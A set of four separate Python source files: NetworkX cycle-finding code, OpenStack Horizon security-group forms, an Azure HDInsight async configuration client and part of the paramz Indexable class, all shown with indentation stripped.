.. [2] Enumerating the cycles of a digraph: a new preprocessing strategy.
G. Loizou and P. Thanish, Information Sciences, v. 27, 163-182, 1982.
.. [3] A search strategy for the elementary cycles of a directed graph.
J.L. Szwarcfiter and P.E. Lauer, BIT NUMERICAL MATHEMATICS,
v. 16, no. 2, 192-204, 1976.
See Also
--------
cycle_basis
"""
def _unblock(thisnode,blocked,B):
stack=set([thisnode])
while stack:
node=stack.pop()
if node in blocked:
blocked.remove(node)
stack.update(B[node])
B[node].clear()
# Johnson's algorithm requires some ordering of the nodes.
# We assign the arbitrary ordering given by the strongly connected comps
# There is no need to track the ordering as each node removed as processed.
subG = type(G)(G.edges_iter()) # save the actual graph so we can mutate it here
# We only take the edges because we do not want to
# copy edge and node attributes here.
sccs = list(nx.strongly_connected_components(subG))
while sccs:
scc=sccs.pop()
# order of scc determines ordering of nodes
startnode = scc.pop()
# Processing node runs "circuit" routine from recursive version
path=[startnode]
blocked = set() # vertex: blocked from search?
closed = set() # nodes involved in a cycle
blocked.add(startnode)
B=defaultdict(set) # graph portions that yield no elementary circuit
stack=[ (startnode,list(subG[startnode])) ] # subG gives component nbrs
while stack:
thisnode,nbrs = stack[-1]
if nbrs:
nextnode = nbrs.pop()
# print thisnode,nbrs,":",nextnode,blocked,B,path,stack,startnode
# f=raw_input("pause")
if nextnode == startnode:
yield path[:]
closed.update(path)
# print "Found a cycle",path,closed
elif nextnode not in blocked:
path.append(nextnode)
stack.append( (nextnode,list(subG[nextnode])) )
closed.discard(nextnode)
blocked.add(nextnode)
continue
# done with nextnode... look for more neighbors
if not nbrs: # no more nbrs
if thisnode in closed:
_unblock(thisnode,blocked,B)
else:
for nbr in subG[thisnode]:
if thisnode not in B[nbr]:
B[nbr].add(thisnode)
stack.pop()
# assert path[-1]==thisnode
path.pop()
# done processing this node
subG.remove_node(startnode)
H=subG.subgraph(scc) # make smaller to avoid work in SCC routine
sccs.extend(list(nx.strongly_connected_components(H)))
@not_implemented_for('undirected')
def recursive_simple_cycles(G):
"""Find simple cycles (elementary circuits) of a directed graph.
A simple cycle, or elementary circuit, is a closed path where no
node appears twice, except that the first and last node are the same.
Two elementary circuits are distinct if they are not cyclic permutations
of each other.
This version uses a recursive algorithm to build a list of cycles.
You should probably use the iterator version caled simple_cycles().
Warning: This recursive version uses lots of RAM!
Parameters
----------
G : NetworkX DiGraph
A directed graph
Returns
-------
A list of circuits, where each circuit is a list of nodes, with the first
and last node being the same.
Example:
>>> G = nx.DiGraph([(0, 0), (0, 1), (0, 2), (1, 2), (2, 0), (2, 1), (2, 2)])
>>> nx.recursive_simple_cycles(G)
[[0], [0, 1, 2], [0, 2], [1, 2], [2]]
See Also
--------
cycle_basis (for undirected graphs)
Notes
-----
The implementation follows pp. 79-80 in [1]_.
The time complexity is O((n+e)(c+1)) for n nodes, e edges and c
elementary circuits.
References
----------
.. [1] Finding all the elementary circuits of a directed graph.
D. B. Johnson, SIAM Journal on Computing 4, no. 1, 77-84, 1975.
http://dx.doi.org/10.1137/0204007
See Also
--------
simple_cycles, cycle_basis
"""
# Jon Olav Vik, 2010-08-09
def _unblock(thisnode):
"""Recursively unblock and remove nodes from B[thisnode]."""
if blocked[thisnode]:
blocked[thisnode] = False
while B[thisnode]:
_unblock(B[thisnode].pop())
def circuit(thisnode, startnode, component):
closed = False # set to True if elementary path is closed
path.append(thisnode)
blocked[thisnode] = True
for nextnode in component[thisnode]: # direct successors of thisnode
if nextnode == startnode:
result.append(path[:])
closed = True
elif not blocked[nextnode]:
if circuit(nextnode, startnode, component):
closed = True
if closed:
_unblock(thisnode)
else:
for nextnode in component[thisnode]:
if thisnode not in B[nextnode]: # TODO: use set for speedup?
B[nextnode].append(thisnode)
path.pop() # remove thisnode from path
return closed
path = [] # stack of nodes in current path
blocked = defaultdict(bool) # vertex: blocked from search?
B = defaultdict(list) # graph portions that yield no elementary circuit
result = [] # list to accumulate the circuits found
# Johnson's algorithm requires some ordering of the nodes.
# They might not be sortable so we assign an arbitrary ordering.
ordering=dict(zip(G,range(len(G))))
for s in ordering:
# Build the subgraph induced by s and following nodes in the ordering
subgraph = G.subgraph(node for node in G
if ordering[node] >= ordering[s])
# Find the strongly connected component in the subgraph
# that contains the least node according to the ordering
strongcomp = nx.strongly_connected_components(subgraph)
mincomp=min(strongcomp,
key=lambda nodes: min(ordering[n] for n in nodes))
component = G.subgraph(mincomp)
if component:
# smallest node in the component according to the ordering
startnode = min(component,key=ordering.__getitem__)
for node in component:
blocked[node] = False
B[node][:] = []
dummy=circuit(startnode, startnode, component)
return result
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from django.conf import settings
from django.core.urlresolvers import reverse
from django.core import validators
from django.forms import ValidationError # noqa
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils import validators as utils_validators
from openstack_dashboard import api
from openstack_dashboard.utils import filters
class CreateGroup(forms.SelfHandlingForm):
name = forms.CharField(label=_("Name"),
max_length=255,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"),
required=False,
widget=forms.Textarea(attrs={'rows': 4}))
def handle(self, request, data):
try:
sg = api.network.security_group_create(request,
data['name'],
data['description'])
messages.success(request,
_('Successfully created security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to create security group.'),
redirect=redirect)
class UpdateGroup(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
name = forms.CharField(label=_("Name"),
max_length=255,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"),
required=False,
widget=forms.Textarea(attrs={'rows': 4}))
def handle(self, request, data):
try:
sg = api.network.security_group_update(request,
data['id'],
data['name'],
data['description'])
messages.success(request,
_('Successfully updated security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to update security group.'),
redirect=redirect)
class AddRule(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
rule_menu = forms.ChoiceField(label=_('Rule'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'rule_menu'}))
# "direction" field is enabled only when custom mode.
# It is because most common rules in local_settings.py is meaningful
# when its direction is 'ingress'.
direction = forms.ChoiceField(
label=_('Direction'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Direction'),
'data-rule_menu-udp': _('Direction'),
'data-rule_menu-icmp': _('Direction'),
'data-rule_menu-custom': _('Direction'),
'data-rule_menu-all_tcp': _('Direction'),
'data-rule_menu-all_udp': _('Direction'),
'data-rule_menu-all_icmp': _('Direction'),
}))
ip_protocol = forms.IntegerField(
label=_('IP Protocol'), required=False,
help_text=_("Enter an integer value between 0 and 255 "
"(or -1 which means wildcard)."),
validators=[utils_validators.validate_ip_protocol],
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-custom': _('IP Protocol')}))
port_or_range = forms.ChoiceField(
label=_('Open Port'),
choices=[('port', _('Port')),
('range', _('Port Range'))],
widget=forms.Select(attrs={
'class': 'switchable switched',
'data-slug': 'range',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Open Port'),
'data-rule_menu-udp': _('Open Port')}))
port = forms.IntegerField(label=_("Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-port': _('Port')}),
validators=[
utils_validators.validate_port_range])
from_port = forms.IntegerField(label=_("From Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('From Port')}),
validators=[
utils_validators.validate_port_range])
to_port = forms.IntegerField(label=_("To Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('To Port')}),
validators=[
utils_validators.validate_port_range])
icmp_type = forms.IntegerField(label=_("Type"),
required=False,
help_text=_("Enter a value for ICMP type "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Type')}),
validators=[
utils_validators.validate_port_range])
icmp_code = forms.IntegerField(label=_("Code"),
required=False,
help_text=_("Enter a value for ICMP code "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Code')}),
validators=[
utils_validators.validate_port_range])
remote = forms.ChoiceField(label=_('Remote'),
choices=[('cidr', _('CIDR')),
('sg', _('Security Group'))],
help_text=_('To specify an allowed IP '
'range, select "CIDR". To '
'allow access from all '
'members of another security '
'group select "Security '
'Group".'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'remote'}))
cidr = forms.IPField(label=_("CIDR"),
required=False,
initial="0.0.0.0/0",
help_text=_("Classless Inter-Domain Routing "
"(e.g. 192.168.0.0/24)"),
version=forms.IPv4 | forms.IPv6,
mask=True,
widget=forms.TextInput(
attrs={'class': 'switched',
'data-switch-on': 'remote',
'data-remote-cidr': _('CIDR')}))
security_group = forms.ChoiceField(label=_('Security Group'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'remote',
'data-remote-sg': _('Security '
'Group')}))
# When cidr is used ethertype is determined from IP version of cidr.
# When source group, ethertype needs to be specified explicitly.
ethertype = forms.ChoiceField(label=_('Ether Type'),
required=False,
choices=[('IPv4', _('IPv4')),
('IPv6', _('IPv6'))],
widget=forms.Select(attrs={
'class': 'switched',
'data-slug': 'ethertype',
'data-switch-on': 'remote',
'data-remote-sg': _('Ether Type')}))
def __init__(self, *args, **kwargs):
sg_list = kwargs.pop('sg_list', [])
super(AddRule, self).__init__(*args, **kwargs)
# Determine if there are security groups available for the
# remote group option; add the choices and enable the option if so.
if sg_list:
security_groups_choices = sg_list
else:
security_groups_choices = [("", _("No security groups available"))]
self.fields['security_group'].choices = security_groups_choices
backend = api.network.security_group_backend(self.request)
rules_dict = getattr(settings, 'SECURITY_GROUP_RULES', [])
common_rules = [(k, rules_dict[k]['name'])
for k in rules_dict
if rules_dict[k].get('backend', backend) == backend]
common_rules.sort()
custom_rules = [('tcp', _('Custom TCP Rule')),
('udp', _('Custom UDP Rule')),
('icmp', _('Custom ICMP Rule'))]
if backend == 'neutron':
custom_rules.append(('custom', _('Other Protocol')))
self.fields['rule_menu'].choices = custom_rules + common_rules
self.rules = rules_dict
if backend == 'neutron':
self.fields['direction'].choices = [('ingress', _('Ingress')),
('egress', _('Egress'))]
else:
# direction and ethertype are not supported in Nova secgroup.
self.fields['direction'].widget = forms.HiddenInput()
self.fields['ethertype'].widget = forms.HiddenInput()
# ip_protocol field is to specify arbitrary protocol number
# and it is available only for neutron security group.
self.fields['ip_protocol'].widget = forms.HiddenInput()
def clean(self):
cleaned_data = super(AddRule, self).clean()
def update_cleaned_data(key, value):
cleaned_data[key] = value
self.errors.pop(key, None)
rule_menu = cleaned_data.get('rule_menu')
port_or_range = cleaned_data.get("port_or_range")
remote = cleaned_data.get("remote")
icmp_type = cleaned_data.get("icmp_type", None)
icmp_code = cleaned_data.get("icmp_code", None)
from_port = cleaned_data.get("from_port", None)
to_port = cleaned_data.get("to_port", None)
port = cleaned_data.get("port", None)
if rule_menu == 'icmp':
update_cleaned_data('ip_protocol', rule_menu)
if icmp_type is None:
msg = _('The ICMP type is invalid.')
raise ValidationError(msg)
if icmp_code is None:
msg = _('The ICMP code is invalid.')
raise ValidationError(msg)
if icmp_type not in range(-1, 256):
msg = _('The ICMP type not in range (-1, 255)')
raise ValidationError(msg)
if icmp_code not in range(-1, 256):
msg = _('The ICMP code not in range (-1, 255)')
raise ValidationError(msg)
update_cleaned_data('from_port', icmp_type)
update_cleaned_data('to_port', icmp_code)
update_cleaned_data('port', None)
elif rule_menu == 'tcp' or rule_menu == 'udp':
update_cleaned_data('ip_protocol', rule_menu)
update_cleaned_data('icmp_code', None)
update_cleaned_data('icmp_type', None)
if port_or_range == "port":
update_cleaned_data('from_port', port)
update_cleaned_data('to_port', port)
if port is None:
msg = _('The specified port is invalid.')
raise ValidationError(msg)
else:
update_cleaned_data('port', None)
if from_port is None:
msg = _('The "from" port number is invalid.')
raise ValidationError(msg)
if to_port is None:
msg = _('The "to" port number is invalid.')
raise ValidationError(msg)
if to_port < from_port:
msg = _('The "to" port number must be greater than '
'or equal to the "from" port number.')
raise ValidationError(msg)
elif rule_menu == 'custom':
pass
else:
cleaned_data['ip_protocol'] = self.rules[rule_menu]['ip_protocol']
cleaned_data['from_port'] = int(self.rules[rule_menu]['from_port'])
cleaned_data['to_port'] = int(self.rules[rule_menu]['to_port'])
if rule_menu not in ['all_tcp', 'all_udp', 'all_icmp']:
direction = self.rules[rule_menu].get('direction')
cleaned_data['direction'] = direction
# NOTE(amotoki): There are two cases where cleaned_data['direction']
# is empty: (1) Nova Security Group is used. Since "direction" is
# HiddenInput, direction field exists but its value is ''.
# (2) Template except all_* is used. In this case, the default value
# is None. To make sure 'direction' field has 'ingress' or 'egress',
# fill this field here if it is not specified.
if not cleaned_data['direction']:
cleaned_data['direction'] = 'ingress'
if remote == "cidr":
update_cleaned_data('security_group', None)
else:
update_cleaned_data('cidr', None)
# If cleaned_data does not contain cidr, cidr is already marked
# as invalid, so skip the further validation for cidr.
# In addition cleaned_data['cidr'] is None means source_group is used.
if 'cidr' in cleaned_data and cleaned_data['cidr'] is not None:
cidr = cleaned_data['cidr']
if not cidr:
msg = _('CIDR must be specified.')
self._errors['cidr'] = self.error_class([msg])
else:
# If cidr is specified, ethertype is determined from IP address
# version. It is used only when Neutron is enabled.
ip_ver = netaddr.IPNetwork(cidr).version
cleaned_data['ethertype'] = 'IPv6' if ip_ver == 6 else 'IPv4'
return cleaned_data
def handle(self, request, data):
try:
rule = api.network.security_group_rule_create(
request,
filters.get_int_or_uuid(data['id']),
data['direction'],
data['ethertype'],
data['ip_protocol'],
data['from_port'],
data['to_port'],
data['cidr'],
data['security_group'])
messages.success(request,
_('Successfully added rule: %s') % unicode(rule))
return rule
except Exception:
redirect = reverse("horizon:project:access_and_security:"
"security_groups:detail", args=[data['id']])
exceptions.handle(request,
_('Unable to add rule to security group.'),
redirect=redirect)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ConfigurationsOperations:
"""ConfigurationsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.hdinsight.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def list(
self,
resource_group_name: str,
cluster_name: str,
**kwargs: Any
) -> "_models.ClusterConfigurations":
"""Gets all configuration information for an HDI cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ClusterConfigurations, or the result of cls(response)
:rtype: ~azure.mgmt.hdinsight.models.ClusterConfigurations
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ClusterConfigurations"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-01"
accept = "application/json"
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ClusterConfigurations', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
cluster_name: str,
configuration_name: str,
parameters: Dict[str, str],
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
'configurationName': self._serialize.url("configuration_name", configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, '{str}')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations/{configurationName}'} # type: ignore
async def begin_update(
self,
resource_group_name: str,
cluster_name: str,
configuration_name: str,
parameters: Dict[str, str],
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Configures the HTTP settings on the specified cluster. This API is deprecated, please use
UpdateGatewaySettings in cluster endpoint instead.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param configuration_name: The name of the cluster configuration.
:type configuration_name: str
:param parameters: The cluster configurations.
:type parameters: dict[str, str]
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
cluster_name=cluster_name,
configuration_name=configuration_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
'configurationName': self._serialize.url("configuration_name", configuration_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations/{configurationName}'} # type: ignore
async def get(
self,
resource_group_name: str,
cluster_name: str,
configuration_name: str,
**kwargs: Any
) -> Dict[str, str]:
"""The configuration object for the specified cluster. This API is not recommended and might be
removed in the future. Please consider using List configurations API instead.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param configuration_name: The name of the cluster configuration.
:type configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: dict mapping str to str, or the result of cls(response)
:rtype: dict[str, str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
'configurationName': self._serialize.url("configuration_name", configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('{str}', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HDInsight/clusters/{clusterName}/configurations/{configurationName}'} # type: ignore
|
|
#===============================================================================
# Copyright (c) 2015, Max Zwiessele
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of paramz.core.indexable nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
import numpy as np
from .nameable import Nameable
from .updateable import Updateable
from ..transformations import __fixed__
from operator import delitem
from functools import reduce
from collections import OrderedDict
class Indexable(Nameable, Updateable):
"""
Make an object constrainable with Priors and Transformations.
TODO: Mappings!!
Adding a constraint to a Parameter means to tell the highest parent that
the constraint was added and making sure that all parameters covered
by this object are indeed conforming to the constraint.
:func:`constrain()` and :func:`unconstrain()` are main methods here
"""
def __init__(self, name, default_constraint=None, *a, **kw):
super(Indexable, self).__init__(name=name, *a, **kw)
self._index_operations = OrderedDict()
def add_index_operation(self, name, operations):
if name not in self._index_operations:
self._index_operations[name] = operations
setattr(self, name, operations)
else:
raise AttributeError("An index operation with the name {} was already taken".format(name))
def remove_index_operation(self, name):
if name in self._index_operations:
delitem(self._index_operations, name)
delattr(self, name)
else:
raise AttributeError("No index operation with the name {}".format(name))
def _disconnect_parent(self, *args, **kw):
"""
From Parentable:
disconnect the parent and set the new constraints to constr
"""
for name, iop in list(self._index_operations.items()):
iopc = iop.copy()
iop.clear()
self.remove_index_operation(name)
self.add_index_operation(name, iopc)
#self.constraints.clear()
#self.constraints = constr
self._parent_ = None
self._parent_index_ = None
self._connect_fixes()
self._notify_parent_change()
#===========================================================================
# Indexable
#===========================================================================
def _offset_for(self, param):
"""
Return the offset of the param inside this parameterized object.
This does not need to account for shaped parameters, as it
basically just sums up the parameter sizes which come before param.
"""
if param.has_parent():
p = param._parent_._get_original(param)
if p in self.parameters:
return reduce(lambda a,b: a + b.size, self.parameters[:p._parent_index_], 0)
return self._offset_for(param._parent_) + param._parent_._offset_for(param)
return 0
### Global index operations (from highest_parent)
### These indices are for gradchecking, so that we
### can index the optimizer array and manipulate it directly
### The indices here do not reflect the indices in
### index_operations, as index operations handle
### the offset themselves and can be set directly
### without doing the offset.
def _raveled_index_for(self, param):
"""
get the raveled index for a param
that is an int array, containing the indexes for the flattened
param inside this parameterized logic.
!Warning! be sure to call this method on the highest parent of a hierarchy,
as it uses the fixes to do its work
"""
from ..param import ParamConcatenation
if isinstance(param, ParamConcatenation):
return np.hstack((self._raveled_index_for(p) for p in param.params))
return param._raveled_index() + self._offset_for(param)
def _raveled_index_for_transformed(self, param):
"""
get the raveled index for a param for the transformed parameter array
(optimizer array).
that is an int array, containing the indexes for the flattened
param inside this parameterized logic.
!Warning! be sure to call this method on the highest parent of a hierarchy,
as it uses the fixes to do its work. If you do not know
what you are doing, do not use this method, it will have
unexpected returns!
"""
ravi = self._raveled_index_for(param)
if self._has_fixes():
fixes = self._fixes_
### Transformed indices, handling the offsets of previous fixes
transformed = (np.r_[:self.size] - (~fixes).cumsum())
return transformed[ravi[fixes[ravi]]]
else:
return ravi
### These indices are just the raveled index for self
### These are in the index_operations are used for them
### The index_operations then handle the offsets themselves
### This makes it easier to test and handle indices
### as the index operations framework is in its own
### corner and can be set significantly better without
### being inside the parameterized scope.
def _raveled_index(self):
"""
Flattened array of ints, specifying the index of this object.
This has to account for shaped parameters!
"""
return np.r_[:self.size]
######
#===========================================================================
# Tie parameters together
# TODO: create own class for tieing and remapping
#===========================================================================
# def _has_ties(self):
# if self._highest_parent_.tie.tied_param is None:
# return False
# if self.has_parent():
